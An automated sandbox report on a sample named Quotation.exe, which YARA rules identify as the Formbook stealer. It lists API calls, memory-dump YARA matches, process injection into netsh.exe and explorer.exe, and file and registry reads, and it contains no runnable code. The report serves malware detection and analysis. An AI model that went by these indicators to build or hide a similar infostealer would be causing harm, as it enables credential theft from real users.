          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Quotation.exe
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419DB3 NtReadFile,1_2_00419DB3
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419F3B NtAllocateVirtualMemory,1_2_00419F3B
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C398F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00C398F0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39840 NtDelayExecution,LdrInitializeThunk,1_2_00C39840
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00C39860
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C399A0 NtCreateSection,LdrInitializeThunk,1_2_00C399A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00C39910
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A50 NtCreateFile,LdrInitializeThunk,1_2_00C39A50
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00C39A00
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A20 NtResumeThread,LdrInitializeThunk,1_2_00C39A20
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C395D0 NtClose,LdrInitializeThunk,1_2_00C395D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39540 NtReadFile,LdrInitializeThunk,1_2_00C39540
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C396E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00C396E0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00C39660
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39780 NtMapViewOfSection,LdrInitializeThunk,1_2_00C39780
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C397A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00C397A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39710 NtQueryInformationToken,LdrInitializeThunk,1_2_00C39710
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C398A0 NtWriteVirtualMemory,1_2_00C398A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3B040 NtSuspendThread,1_2_00C3B040
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39820 NtEnumerateKey,1_2_00C39820
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C399D0 NtCreateProcessEx,1_2_00C399D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39950 NtQueueApcThread,1_2_00C39950
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A80 NtOpenDirectoryObject,1_2_00C39A80
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A10 NtQuerySection,1_2_00C39A10
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3A3B0 NtGetContextThread,1_2_00C3A3B0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39B00 NtSetValueKey,1_2_00C39B00
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C395F0 NtQueryInformationFile,1_2_00C395F0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39560 NtWriteFile,1_2_00C39560
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39520 NtWaitForSingleObject,1_2_00C39520
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3AD30 NtSetContextThread,1_2_00C3AD30
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C396D0 NtCreateKey,1_2_00C396D0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39650 NtQueryValueKey,1_2_00C39650
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39670 NtQueryInformationProcess,1_2_00C39670
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39610 NtEnumerateValueKey,1_2_00C39610
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39FE0 NtCreateMutant,1_2_00C39FE0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39760 NtOpenProcess,1_2_00C39760
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39770 NtSetInformationFile,1_2_00C39770
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3A770 NtOpenThread,1_2_00C3A770
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3A710 NtOpenProcessToken,1_2_00C3A710
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39730 NtQueryVirtualMemory,1_2_00C39730
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419D60 NtCreateFile,1_1_00419D60
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419E10 NtReadFile,1_1_00419E10
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419E90 NtClose,1_1_00419E90
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,1_1_00419F40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9710 NtQueryInformationToken,LdrInitializeThunk,8_2_034C9710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9FE0 NtCreateMutant,LdrInitializeThunk,8_2_034C9FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9780 NtMapViewOfSection,LdrInitializeThunk,8_2_034C9780
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A50 NtCreateFile,LdrInitializeThunk,8_2_034C9A50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C96D0 NtCreateKey,LdrInitializeThunk,8_2_034C96D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C96E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_034C96E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9540 NtReadFile,LdrInitializeThunk,8_2_034C9540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_034C9910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C95D0 NtClose,LdrInitializeThunk,8_2_034C95D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C99A0 NtCreateSection,LdrInitializeThunk,8_2_034C99A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9840 NtDelayExecution,LdrInitializeThunk,8_2_034C9840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9860 NtQuerySystemInformation,LdrInitializeThunk,8_2_034C9860
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9760 NtOpenProcess,8_2_034C9760
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9770 NtSetInformationFile,8_2_034C9770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CA770 NtOpenThread,8_2_034CA770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9B00 NtSetValueKey,8_2_034C9B00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CA710 NtOpenProcessToken,8_2_034CA710
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9730 NtQueryVirtualMemory,8_2_034C9730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C97A0 NtUnmapViewOfSection,8_2_034C97A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CA3B0 NtGetContextThread,8_2_034CA3B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9650 NtQueryValueKey,8_2_034C9650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9660 NtAllocateVirtualMemory,8_2_034C9660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9670 NtQueryInformationProcess,8_2_034C9670
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A00 NtProtectVirtualMemory,8_2_034C9A00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9610 NtEnumerateValueKey,8_2_034C9610
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A10 NtQuerySection,8_2_034C9A10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A20 NtResumeThread,8_2_034C9A20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A80 NtOpenDirectoryObject,8_2_034C9A80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9950 NtQueueApcThread,8_2_034C9950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9560 NtWriteFile,8_2_034C9560
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9520 NtWaitForSingleObject,8_2_034C9520
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CAD30 NtSetContextThread,8_2_034CAD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C99D0 NtCreateProcessEx,8_2_034C99D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C95F0 NtQueryInformationFile,8_2_034C95F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CB040 NtSuspendThread,8_2_034CB040
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9820 NtEnumerateKey,8_2_034C9820
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C98F0 NtReadVirtualMemory,8_2_034C98F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C98A0 NtWriteVirtualMemory,8_2_034C98A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9E90 NtClose,8_2_02BB9E90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9E10 NtReadFile,8_2_02BB9E10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9D60 NtCreateFile,8_2_02BB9D60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9E8A NtClose,8_2_02BB9E8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9DB3 NtReadFile,8_2_02BB9DB3
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403166
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004046C30_2_004046C3
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004060D90_2_004060D9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004068B00_2_004068B0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004010271_2_00401027
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041E1001_2_0041E100
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041E2461_2_0041E246
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041DF121_2_0041DF12
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041DF1C1_2_0041DF1C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC28EC1_2_00CC28EC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B0901_2_00C0B090
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A01_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC20A81_2_00CC20A8
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB10021_2_00CB1002
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CCE8241_2_00CCE824
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFF9001_2_00BFF900
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C141201_2_00C14120
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC22AE1_2_00CC22AE
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBDBD21_2_00CBDBD2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2EBB01_2_00C2EBB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC2B281_2_00CC2B28
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBD4661_2_00CBD466
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0841F1_2_00C0841F
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC25DD1_2_00CC25DD
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0D5E01_2_00C0D5E0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC1D551_2_00CC1D55
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF0D201_2_00BF0D20
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC2D071_2_00CC2D07
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC2EF71_2_00CC2EF7
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBD6161_2_00CBD616
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C16E301_2_00C16E30
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC1FF11_2_00CC1FF1
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_004010271_1_00401027
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_0041E1001_1_0041E100
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_0041E2461_1_0041E246
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BEBB08_2_034BEBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A6E308_2_034A6E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03551D558_2_03551D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348F9008_2_0348F900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03480D208_2_03480D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A41208_2_034A4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_035410028_2_03541002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B0908_2_0349B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBE2468_2_02BBE246
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBE1008_2_02BBE100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA9E3C8_2_02BA9E3C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA9E408_2_02BA9E40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA2FB08_2_02BA2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBDF1C8_2_02BBDF1C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBDF128_2_02BBDF12
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA2D908_2_02BA2D90
          Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BFB150 appears 35 times
          Source: Quotation.exe, 00000000.00000003.236412291.000000001ECB6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
          Source: Quotation.exe, 00000000.00000002.242016768.00000000022D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAVICAP32.DLL.MUIj% vs Quotation.exe
          Source: Quotation.exe, 00000000.00000002.242012748.00000000022C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs Quotation.exe
          Source: Quotation.exe, 00000001.00000002.278859602.000000000096C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs Quotation.exe
          Source: Quotation.exe, 00000001.00000002.279247489.0000000000E7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
          Source: Quotation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@4/4
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404201
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
          Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsz4E33.tmpJump to behavior
          Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Quotation.exeReversingLabs: Detection: 22%
          Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
